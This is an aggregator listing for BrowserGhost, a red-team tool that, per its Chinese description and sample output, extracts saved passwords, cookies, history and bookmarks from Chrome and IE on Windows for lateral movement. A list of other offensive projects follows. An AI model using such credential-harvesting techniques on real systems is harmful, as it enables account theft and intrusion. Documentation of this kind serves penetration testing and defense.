QAX-A-Team / Browserghost
这是一个抓取浏览器密码的工具,后续会添加更多功能
Stars: ✭ 559
Labels
Projects that are alternatives of or similar to Browserghost
Defcon27 csharp workshop
Writing custom backdoor payloads with C# - Defcon 27 Workshop
Stars: ✭ 491 (-12.16%)
Mutual labels: redteam
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: ✭ 6,030 (+978.71%)
Mutual labels: redteam
Stowaway
👻Stowaway -- Multi-hop Proxy Tool for pentesters
Stars: ✭ 500 (-10.55%)
Mutual labels: redteam
0xsp Mongoose
a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.
Stars: ✭ 419 (-25.04%)
Mutual labels: redteam
Theharvester
E-mails, subdomains and names Harvester - OSINT
Stars: ✭ 6,175 (+1004.65%)
Mutual labels: redteam
Repo Supervisor
Scan your code for security misconfiguration, search for passwords and secrets. 🔍
Stars: ✭ 482 (-13.77%)
Mutual labels: redteam
Hershell
Hershell is a simple TCP reverse shell written in Go.
Stars: ✭ 442 (-20.93%)
Mutual labels: redteam
Slackpirate
Slack Enumeration and Extraction Tool - extract sensitive information from a Slack Workspace
Stars: ✭ 512 (-8.41%)
Mutual labels: redteam
Wadcoms.github.io
WADComs is an interactive cheat sheet, containing a curated list of Unix/Windows offensive tools and their respective commands.
Stars: ✭ 431 (-22.9%)
Mutual labels: redteam
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 32,909 (+5787.12%)
Mutual labels: redteam
Emp3r0r
linux post-exploitation framework made by linux user
Stars: ✭ 419 (-25.04%)
Mutual labels: redteam
Nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Stars: ✭ 5,943 (+963.15%)
Mutual labels: redteam
Sherlock
🔎 Hunt down social media accounts by username across social networks
Stars: ✭ 28,569 (+5010.73%)
Mutual labels: redteam
BrowserGhost
介绍:
这是一个抓取浏览器密码的工具,后续会添加更多功能
当前已经完成的功能:
- 实现system抓机器上其他用户的浏览器密码(方便横向移动时快速凭据采集)
- 用.net2 实现可兼容大部分windows,并去掉依赖(不需要System.Data.SQLite.dll这些累赘)
- 可以解密chrome全版本密码(chrome80版本后加密方式变了)
- Chrome已经可以获取login data、cookie、history、book了
- IE 支持获取书签、密码、history了 (.net2提取密码太复杂了代码参考至
https://github.com/djhohnstein/SharpWeb/raw/master/Edge/SharpEdge.cs)
即将去做:
- system权限下获取IE History有点问题
- 优化输出
- 监控实时cookie
- 兼容其他主流浏览器(firefox、360极速浏览器等)
C:\Users\Administrator\Desktop>BrowserGhost.exe
[+] Current user Administrator
[*] [4764] [explorer] [Administrator]
[*] Impersonate user Administrator
[*] Current user Administrator
===============Chrome=============
[*]Get Chrome Login Data
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[URL] -> https://xui.ptlogin2.qq.com/cgi-bin/xlogin
[USERNAME] -> [email protected]
[PASSWORD] -> Iloveprettygirls
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[*]Get Chrome Bookmarks
{
"checksum": "eee70b132cc4f9644d01f989e18fdb38",
"roots": {
"bookmark_bar": {
"children": [ {
"date_added": "13236861887917624",
"guid": "c5df2041-d745-4173-af39-b5c48f8d98a2",
"id": "5",
"name": "GitHub",
"type": "url",
"url": "https://github.com/"
} ],
"date_added": "13236861618031351",
"date_modified": "13236861887917624",
"guid": "00000000-0000-4000-a000-000000000002",
"id": "1",
"name": "书签栏",
"type": "folder"
},
"other": {
"children": [ ],
"date_added": "13236861618031378",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000003",
"id": "2",
"name": "其他书签",
"type": "folder"
},
"synced": {
"children": [ ],
"date_added": "13236861618031381",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000004",
"id": "3",
"name": "移动设备书签",
"type": "folder"
}
},
"version": 1
}
[*]Get Chrome Cookie
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[github.com] _device_id=516175fxxxxxxxxx90133c2
[.github.com] _octo=GH1.1.3xxxxxxxxx5173
[.google.com] NID=204=DEIRBPT8FML_IsHGv1B2xxxxxxxxxxxxxxxxxxxSRlaNRV3-nfhFV8aHAgO6Smtf4JXQqR-W63p0KOVKgVd0VCXv4bKww97DEhc-PI1sVdbD4hGOuVwchN4Bwo-V61AtfjZM
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[*]Get Chrome History
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
http://github.com/ The world’s leading software development platform · GitHub
https://github.com/ GitHub
https://github.com/login Sign in to GitHub · GitHub
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
===============IE=============
[*]Get IE Books
C:\Users\Administrator\Favorites\Sign in to GitHub · GitHub.url
URL=https://github.com/session
[*]Get IE Password
Vault Type : Web Credentials
Resource : https://github.com/
Identity : [email protected]
Credential : Iloveprettygirls
LastModified : 2020/6/17 7:08:50
[*]Get IE History
https://github.com/login
https://github.com/join
https://github.com/john
https://github.com/sign
http://github.com/
http://go.microsoft.com/fwlink/p/?LinkId=255141
[*] Recvtoself
[*] Current user Administrator
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].